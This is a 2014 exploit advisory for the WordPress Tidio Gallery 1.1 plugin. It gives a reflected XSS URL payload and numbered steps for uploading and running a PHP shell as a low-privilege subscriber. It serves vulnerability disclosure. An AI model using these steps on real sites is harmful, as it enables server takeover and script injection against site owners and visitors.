WordPress Tidio Gallery 1.1 Shell Upload / XSS

`######################  
# Exploit Title : Wordpress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities  
  
# Exploit Author : Claudio Viviani  
  
# Vendor Homepage : http://www.tidioelements.com/  
  
# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip  
  
# Date : 2014-07-14  
  
# Tested on : Windows 7 / Mozilla Firefox  
  
######################  
  
# Location :   
  
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS  
  
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell  
  
  
######################  
  
# Vulnerablity n°1:  
  
XSS Reflected Unauthenticated  
  
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>  
  
# Vulnerablity n°2:  
  
Unprivileged user like subscriber could upload shell script.  
The plugin rename file with "md5(microtime())" php functions.   
  
1) Connect to url: http://VICTIM/wp-admin/admin-ajax.php?action=tidio_gallery_popup_insert_post  
  
2) Click "add gallery" button  
  
3) Click "edit" option  
  
4) Click "add image" button  
  
5) Click "upload" option and select php shell from local drive  
  
6) Refresh page (ex. press F5 key)  
  
7) View source page (ex. right-click -> view source page) and search string like this:   
"fileUrl":"http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php"  
Skip file with "*-thumb.php" extension.  
  
8) Open browser and connect to http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php  
  
  
#####################  
  
Discovered By : Claudio Viviani  
http://www.homelab.it  
[email protected]  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
  
#####################  
`